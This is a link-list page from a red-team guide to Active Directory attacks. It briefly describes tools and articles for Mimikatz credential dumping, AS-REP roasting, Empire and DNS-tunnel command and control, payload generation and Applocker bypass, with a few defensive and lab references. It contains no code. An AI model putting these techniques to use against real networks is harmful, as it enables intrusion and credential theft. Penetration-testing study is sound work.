DarthSidious
  • Darth Sidious
  • GETTING STARTED
    • Getting started
    • External network access to Domain Admin
    • Intro to Windows hashes
  • Building a lab
    • Building a lab
    • Preparing Kali
    • Building a small lab
    • Building a lab with ESXI and Vagrant
    • Cuckoo malware analysis lab
  • Initial access
    • Password spraying
    • Initial access through exchange
  • ENUMERATION
    • Powershell
    • BloodHound
    • PowerView
    • Azure enumeration
  • Execution
    • Pass the hash
    • Responder with NTLM relay and Empire
    • DeathStar
    • CrackMapExec
  • Privilege escalation
    • Mimikatz
    • Token Impersonation
    • Juicy Potato
    • ALPC bug 0day
  • Defense evasion
    • Bypassing Applocker and Powershell contstrained language mode
    • From RDS app to Empire shell
    • Stealth
  • OTHER
    • Link encyclopedia
    • Writeups
      • lkylabs v1
    • War stories
      • Domain admin in 30 minutes
  • Credential access
    • Password cracking and auditing
  • Command & Control
    • SILENTTRINITY
Powered by GitBook
On this page
  • Microsoft
  • Powershell
  • Empire
  • Powerview
  • Bloodhound
  • Mimikatz
  • Enumeration
  • Kerberos
  • Tunneling
  • Command and control (C2)
  • Exploit
  • Breaking out of locked down environments
  • Defense
  • Lab building
  • Other
  1. OTHER

Link encyclopedia

PreviousStealthNextWriteups

Last updated 7 years ago

Going to try to keep this updated.

Microsoft

Powershell

  • - Companion videos to the famous book

  • - Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls.

  • - GetSPN and other things

Empire

  • - Empire Introduction from official documentation

Powerview

  • - contains documentation and how to use Powerview

  • - Powerview tips and tricks from HarmJ0y

Bloodhound

  • - Bloodhound Node info explanations

  • - General Bloodhound usage guide article

Mimikatz

Enumeration

Kerberos

Tunneling

Command and control (C2)

Exploit

Mail

Breaking out of locked down environments

Defense

Lab building

Other

- Mass Mimikatz with AV bypass (questionable)

- Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS

- Invoke-Portscan is a module from Powersploit that can perform port scans similar to Nmap straight from Powershell.

- Finding local admins in AD

- Article about Kerberos preauthentication

- Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled.

- SShuttle creates an SSH tunnel that works almost just like a VPN

- Using Amazon AWS EC2 for C2

- Powershell implementation of dnscat2 client

- dnscat2 can be used with powershell for working over DNS to hide C2 activity

- How DNS tunneling works

- SharpShooter can create payloads for many formats like HTA, JS and VBS

- DCShadow, attack technique to create a rogue domain controller

- Ruler can interact with Exchange servers remotely

- Breaking out of Applocker using advanced techniques

- List of most known Applocker bypass techniques

- Reference material for securing admin access in AD

- Red forest design is building an administrative AD environement built with security in mind

- Official MSDN ISOs for all OSes

- Automatedlab is a project for building a lab environment automatically using Powershell.

- Big article from this book about building a lab using ESXi

- Small article from this book about creating a small lab for practicing things like Responder

- contains a ton of useful commands for enumeration and exploitation

Powershell 101
Learn Windows PowerShell in a Month of Lunches (Youtube)
p3nt4/PowerShdll
nullbind/Powershellery
Empire 101
Powerview repository
PowerView-3.0-tricks.ps1
Bloodhound node info
Lay of the land with bloodhound
Lazykats
Direct link to Invoke-Mimikatz.ps1
Auto dumping domain credentials
eladshamir/Internal-Monologue
Invoke-Portscan.ps1
Walking back local admins
HarmJ0y - roasting-as-reps
HarmJ0y/ASREPRoast
SShuttle
SANS Pentest Blog
lukebaggett/dnscat2-powershell
C2 with dnscat2 and powershell
DNS tunneling
SharpShooter
DCShadow
Ruler
Breaking Out of Citrix and other Restricted Desktop Environments
Applocker Case study
Bypass Applocker
Babushka Dolls or How To Bypass Application Whitelisting and Constrained Powershell
MS - Securing privileged access
MS - What is AD Red Forest
Managing Applocker with Powershell
SANS - Finding Empire C2 activity
The Eye
Automatedlab/Automatedlab
Building a lab with ESXI and Vagrant
Mini lab
OSCP Survival Guide archived